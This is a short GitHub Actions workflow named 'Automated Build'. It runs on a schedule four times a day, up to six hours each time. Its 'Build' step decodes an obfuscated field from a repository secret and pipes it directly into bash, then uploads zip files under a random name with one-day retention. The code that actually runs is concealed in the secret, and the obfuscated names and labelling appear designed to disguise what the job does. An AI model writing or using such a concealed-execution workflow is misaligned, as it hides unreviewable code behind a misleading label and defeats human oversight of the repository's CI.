name: Automated Build
on:
  workflow_dispatch:

  schedule:
    - cron: '24 3,9,15,21 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          rjwam135: ${{ secrets.rjwam135 }}
        run: |
          printf '%s' "$rjwam135" | jq -r .u41673 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: AWt7fJqK
          path: "*.zip"
          retention-days: 1
